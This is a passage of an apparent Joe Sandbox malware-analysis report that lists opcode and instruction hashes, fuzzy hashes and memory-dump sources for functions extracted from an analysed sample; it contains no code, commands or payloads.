                                                                                                                                                    • Instruction ID: cb66ae038a48bd2e0ed563e753094cb9bf1b545d4f68ee9dbf69d0cbbe873adb
                                                                                                                                                    • Opcode Fuzzy Hash: d923a3c8f551a007bd8add960f563930e6aee257f38179b2fb77bb28a126017b
                                                                                                                                                    • Instruction Fuzzy Hash: 26716134B18204CFDB14EF95E449BEAB3B3EB88311F18C066E8059B399C7789DC59B91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 19395ceb43fc935784d6a8bf066c4545cc7d4c9829a997ba5a06f02d233efb25
                                                                                                                                                    • Instruction ID: a3bece40e08b481f32f61a4e878da89006535f4e4c4f10bb992c3fe179e95ac0
                                                                                                                                                    • Opcode Fuzzy Hash: 19395ceb43fc935784d6a8bf066c4545cc7d4c9829a997ba5a06f02d233efb25
                                                                                                                                                    • Instruction Fuzzy Hash: FF614F34B18204CFD714EF95E449BEAB3B3EB88311F28C066E8059B799C7789DC59B91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f56fb021b9638e25380a447cb2f26912c1e524fd3a11976c9b7f8195ac36082c
                                                                                                                                                    • Instruction ID: f7aff302c8b6b0c43a4a2cb9ca5ba8d996b12e582b80448d6ec38058e89aa013
                                                                                                                                                    • Opcode Fuzzy Hash: f56fb021b9638e25380a447cb2f26912c1e524fd3a11976c9b7f8195ac36082c
                                                                                                                                                    • Instruction Fuzzy Hash: 866173306052049FD704EF99E959BEEB7B3EB88305F28C066E50597399CB349E86CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 782897d3183b65863ee2fee5aefcd85c42eb237f91849310afd9855e154e595f
                                                                                                                                                    • Instruction ID: 50e27bb5729ef6e7d4bfd91df2d19ff4b01de2ebb64ebd3b44823cd9911e533b
                                                                                                                                                    • Opcode Fuzzy Hash: 782897d3183b65863ee2fee5aefcd85c42eb237f91849310afd9855e154e595f
                                                                                                                                                    • Instruction Fuzzy Hash: C7612A347502149FCB18DF68D894AAEB7B6FF89710F148169E506DB3A6CB30EC41CB94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 38faa72cb1b6fcbf11c9024edb519014fc91cc577e229cb03536d95b552989c3
                                                                                                                                                    • Instruction ID: 3cc21e92decd09aab6739660bd99c25fd1d725a4f5cf4d7035f7074111a118a6
                                                                                                                                                    • Opcode Fuzzy Hash: 38faa72cb1b6fcbf11c9024edb519014fc91cc577e229cb03536d95b552989c3
                                                                                                                                                    • Instruction Fuzzy Hash: 4E513C347086008BD714BFA5E9093AB73A2EFC5700F10D175D5064B3CADB38AE4A97D2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4856a336cecc58bbbfe38a58440ca910ec1257a6c0f65caeb82658505dc96433
                                                                                                                                                    • Instruction ID: ce9f3333c7bec212cad0a7e8609cab061f6e98f10d4387f9fc4cbee7eb32a975
                                                                                                                                                    • Opcode Fuzzy Hash: 4856a336cecc58bbbfe38a58440ca910ec1257a6c0f65caeb82658505dc96433
                                                                                                                                                    • Instruction Fuzzy Hash: 2D51AF34B092048FDB04EBA9E4597EEB3B3EFC8710F28D166D4059B399DB349D858B91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2cf7f20755f42a838fb53fa309d4b813efbeb3e90d26ccc0665b5155ef3e84c9
                                                                                                                                                    • Instruction ID: 8bfad82d581591e4de59265c8be5a2df5252b3f35acb76923afb5b4e57752bc8
                                                                                                                                                    • Opcode Fuzzy Hash: 2cf7f20755f42a838fb53fa309d4b813efbeb3e90d26ccc0665b5155ef3e84c9
                                                                                                                                                    • Instruction Fuzzy Hash: 18515974A48118DFCB14CF98D684AACBBB1BF18310FA14197D806AF366C778ED49DB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ba6c62669177dfd7f24572fba431f2f0e55c87dc44a1819a69195140e66e8bea
                                                                                                                                                    • Instruction ID: bc2e9d3c6f082237b1df9ca350fc66ddb151d191d8245aa89b5ebdae5887ce9c
                                                                                                                                                    • Opcode Fuzzy Hash: ba6c62669177dfd7f24572fba431f2f0e55c87dc44a1819a69195140e66e8bea
                                                                                                                                                    • Instruction Fuzzy Hash: D4517134B01609DFCB18DF64E898BAE7776FF88711F10811AE5029B3A4DF309946DB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: fa9a3615b105eedc1a028176c3ecef9e7b5e5bde4a5bae11a24d55475a96d286
                                                                                                                                                    • Instruction ID: 4f767846ab28ae5a627363457401970621a38d0d26cd2674ef19148b64016732
                                                                                                                                                    • Opcode Fuzzy Hash: fa9a3615b105eedc1a028176c3ecef9e7b5e5bde4a5bae11a24d55475a96d286
                                                                                                                                                    • Instruction Fuzzy Hash: 2C516B75A08158DFCB14CF94C684A9CBBB1AF15310FA28197D856AF366C338ED4ACB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2047f425a33d8e0d6bd3a9758c12f8be404da5342f871761009d4ba609455355
                                                                                                                                                    • Instruction ID: 6db0fe7507f38bed4934e3943e186530d255e39746d07eb2c8bbe1d87719cc81
                                                                                                                                                    • Opcode Fuzzy Hash: 2047f425a33d8e0d6bd3a9758c12f8be404da5342f871761009d4ba609455355
                                                                                                                                                    • Instruction Fuzzy Hash: C1519E30A06204CFDB04EBA5E4097EAB3B3AB88311F28C169D40557759CB759EC69B86
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 33f9560ff6058cd2d3cab023e8d76caad16953027a322f47d03bcbd0089e60f7
                                                                                                                                                    • Instruction ID: 86a2e636e57a6a85aff4c8227c79453b11ae4d0d1c1d0e7d6b2eb268cfd5b6c9
                                                                                                                                                    • Opcode Fuzzy Hash: 33f9560ff6058cd2d3cab023e8d76caad16953027a322f47d03bcbd0089e60f7
                                                                                                                                                    • Instruction Fuzzy Hash: 23516D347092048FDB04EBA9E4597EAB3B3EBC8710F28D166D4059B39ADB349D85CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 01049ce0be7e9b818dcbc0497c0a4f3801cfec9e046dbf34b7d568d57a7cc6c0
                                                                                                                                                    • Instruction ID: 0af41a92415af04396489858ffd9bdd3c2c0f8b11cf90cd90c74284d45658e31
                                                                                                                                                    • Opcode Fuzzy Hash: 01049ce0be7e9b818dcbc0497c0a4f3801cfec9e046dbf34b7d568d57a7cc6c0
                                                                                                                                                    • Instruction Fuzzy Hash: 7F41BF31B047548FCB64CB78E5542DBBBF2AF84310B08896ED05AD7B84DA30ED46CB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 84f270b5e8f07504b3da229ff7469882ed6b67cf8783b1c7607536e2320d906d
                                                                                                                                                    • Instruction ID: e14c5650582683b74187c86ce25c938746a19be6f5441e98dcb058b4c245792e
                                                                                                                                                    • Opcode Fuzzy Hash: 84f270b5e8f07504b3da229ff7469882ed6b67cf8783b1c7607536e2320d906d
                                                                                                                                                    • Instruction Fuzzy Hash: A5415D34B403159FC718DF68D894BABBBF6AF89301F14C429E9059B394CB31EA06CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ff7d15b4fcc036826e8b58748d69db3b73478006f6b16212fcc39c8acb1317e2
                                                                                                                                                    • Instruction ID: 9c2c04d0b042be227e1b09a1c531df8219d056c995530b752bfdcbd7559dda93
                                                                                                                                                    • Opcode Fuzzy Hash: ff7d15b4fcc036826e8b58748d69db3b73478006f6b16212fcc39c8acb1317e2
                                                                                                                                                    • Instruction Fuzzy Hash: B741A631A002199FCB05DFA4D865AEEB7B2FF8D310F14806AD901BB3A1CB359D41CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 795c1c61360ebc1f5c85c23d7e391f0224877fe02157e340e7f16577735c593d
                                                                                                                                                    • Instruction ID: ba0a20db8e7f26d5e49d4e0fb88f21a6fb3958b7912600eb09857f645d5b9a8c
                                                                                                                                                    • Opcode Fuzzy Hash: 795c1c61360ebc1f5c85c23d7e391f0224877fe02157e340e7f16577735c593d
                                                                                                                                                    • Instruction Fuzzy Hash: A231B575B042408FC7059F68D4547AA7BF2EF85300F2488BAD509DF2A6DB71DC46CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7f5cb77d8b667a6bd8b8208d5adfeb65971723dc341892e91ab9dc4efcb336f7
                                                                                                                                                    • Instruction ID: da94484996c0e4dc474882edb835be35f99bf22da5d7f4e7fb77821424cde779
                                                                                                                                                    • Opcode Fuzzy Hash: 7f5cb77d8b667a6bd8b8208d5adfeb65971723dc341892e91ab9dc4efcb336f7
                                                                                                                                                    • Instruction Fuzzy Hash: 61312830A0464A8BDB05CF68C8106EFFBB2AFC5304F14813BD604EB745DA758986CB96
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: aea103dff92daf68fcd92575bb16c4de58d044f10bd1097836722c5edba6bea7
                                                                                                                                                    • Instruction ID: 509c7065617a16ae78e859dc6b701401733a22ade59d83e5e45c1ecf593c286e
                                                                                                                                                    • Opcode Fuzzy Hash: aea103dff92daf68fcd92575bb16c4de58d044f10bd1097836722c5edba6bea7
                                                                                                                                                    • Instruction Fuzzy Hash: D53138366401189FCB09CF68D988E99BBB2FF48324F0684A8E5099B372D732EC15DF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: cf00b18f3506baa29c1f84542c48a411d44ff3330fcaf85696760522cd9a37b5
                                                                                                                                                    • Instruction ID: e6da276792cc1eb12bc42d8f68d3e3c33ed13fe0d1c80de37a55e081015e6e0c
                                                                                                                                                    • Opcode Fuzzy Hash: cf00b18f3506baa29c1f84542c48a411d44ff3330fcaf85696760522cd9a37b5
                                                                                                                                                    • Instruction Fuzzy Hash: E9416C31A407258FDB18CFA5D9846AFBBB6FF88306F108429D505E73A0EB319E45CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c6a7680bcfbbc45a4873cc08a5e5f75a7c6e8d5ecd693573693bbf901ffb9228
                                                                                                                                                    • Instruction ID: 1c5b6286c980766359e1c1b93ed1ee0450ce3d6dc2a89f07add1508ca9636f68
                                                                                                                                                    • Opcode Fuzzy Hash: c6a7680bcfbbc45a4873cc08a5e5f75a7c6e8d5ecd693573693bbf901ffb9228
                                                                                                                                                    • Instruction Fuzzy Hash: BA310B70A002099FCB05EFA4D955AADBBF2FF88311F108929D416A7355DB39AE45CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 60f2d7781ba90592d2064f4bbd00436754bb4895efa7faaa8c6e9e451b80f59f
                                                                                                                                                    • Instruction ID: 14fa3a8820a42cbecb1fe2c59f8912cf66621039b68806db486b6e6e61b3488d
                                                                                                                                                    • Opcode Fuzzy Hash: 60f2d7781ba90592d2064f4bbd00436754bb4895efa7faaa8c6e9e451b80f59f
                                                                                                                                                    • Instruction Fuzzy Hash: EE212B313052408FC7258BA9F9446A67BD6DFC2361B0985BBE00EC7292DB21EC42C751
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d9f03b4e01b6f289736d6be3b0e7e74887432b20d591c64f8a31020920edb739
                                                                                                                                                    • Instruction ID: 89886641366cfb35aa08f016108599de7e03b893e4b1baba8285d444577b4edf
                                                                                                                                                    • Opcode Fuzzy Hash: d9f03b4e01b6f289736d6be3b0e7e74887432b20d591c64f8a31020920edb739
                                                                                                                                                    • Instruction Fuzzy Hash: 6C11CD5218F3D22FCB1347B46C75486BF709E5316176A4ADBD5C4CA4E3C14C099BC7A2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0b3568a45a4db8bd4333be852bf026cfc3cff0feab9f5cedac7995f1c17ab63b
                                                                                                                                                    • Instruction ID: a8ad40879535e3ed1b554c6d5efa700c215a05b6b6d3ece3f74290b522de683d
                                                                                                                                                    • Opcode Fuzzy Hash: 0b3568a45a4db8bd4333be852bf026cfc3cff0feab9f5cedac7995f1c17ab63b
                                                                                                                                                    • Instruction Fuzzy Hash: DE319E31B04104CFDB10EF65E9097EEB3B3EB88325F249066D6016728ACB74A985CB95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8d7bcb79b7cf216d1e3a5df9f7badc4b8f18206fc8a9d344399ebedf9089f9ae
                                                                                                                                                    • Instruction ID: bd120155354c9475d29cca0884aec7ba498afb743ee936530730405142d99493
                                                                                                                                                    • Opcode Fuzzy Hash: 8d7bcb79b7cf216d1e3a5df9f7badc4b8f18206fc8a9d344399ebedf9089f9ae
                                                                                                                                                    • Instruction Fuzzy Hash: 9F314C74A00619CBDB28CB10C590FBAB3B2AF54704F6181CADB4AA7355D774EE81DF85
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b8cb89a5b147fd0819809ae216310507f66c73f228c42e10ae05854df47c52d7
                                                                                                                                                    • Instruction ID: 0cc83ec34cc323dc9f42712ac8c7e3f4137d9eb2eef9a3044c4883bbf554cae4
                                                                                                                                                    • Opcode Fuzzy Hash: b8cb89a5b147fd0819809ae216310507f66c73f228c42e10ae05854df47c52d7
                                                                                                                                                    • Instruction Fuzzy Hash: 68213A30B0061907D719796698907BF96DB9FC1714F19863F930957385CE7EAD0243D9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 093cdb516298a7d98bb8dbb4ee7982701f470bc3c68a389803f488f8de57322f
                                                                                                                                                    • Instruction ID: a00c28b20cd444aa299c87a4017f4bdc6a7fa09f4e712ce9c665cf223d4ce9e4
                                                                                                                                                    • Opcode Fuzzy Hash: 093cdb516298a7d98bb8dbb4ee7982701f470bc3c68a389803f488f8de57322f
                                                                                                                                                    • Instruction Fuzzy Hash: 0C315C74A006298BDB24CB10C590BBEB3B2AF54700F6181CADB4AA7351D774EE81DF85
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 21df5f8e63444cf25071e7e5c077568b5d478bac20e33c7aa97a06edfb13680b
                                                                                                                                                    • Instruction ID: 4d14c3951a2296932bdeb2977b29484943574f87cf89d27d2d9d1873ff089f5d
                                                                                                                                                    • Opcode Fuzzy Hash: 21df5f8e63444cf25071e7e5c077568b5d478bac20e33c7aa97a06edfb13680b
                                                                                                                                                    • Instruction Fuzzy Hash: C5218874B10A09CFCB04EF68D5545AEB7B6FF89700F10412AE516A7360EF70A946CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 41a93cb0d7d359d081b9f8f316ac290c80788ec47be1d4f81a657abc81ecc5fd
                                                                                                                                                    • Instruction ID: eecd404e09ae23b7b986e69bb1b5410f81f86297b26ad5124e71f7d673681e78
                                                                                                                                                    • Opcode Fuzzy Hash: 41a93cb0d7d359d081b9f8f316ac290c80788ec47be1d4f81a657abc81ecc5fd
                                                                                                                                                    • Instruction Fuzzy Hash: A6314931A09204CFE714DB5AE4897E973B3EB88311F6DD0A6D5048B3A9C7749EC6DB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5581d03d8324408a84dac049884a368c690930603b4a7dc84c63fb8adeb7b18e
                                                                                                                                                    • Instruction ID: de23c1e081cd035961d8752a6c2aaa36cf655317646faf29b6d06cbe82f95b8d
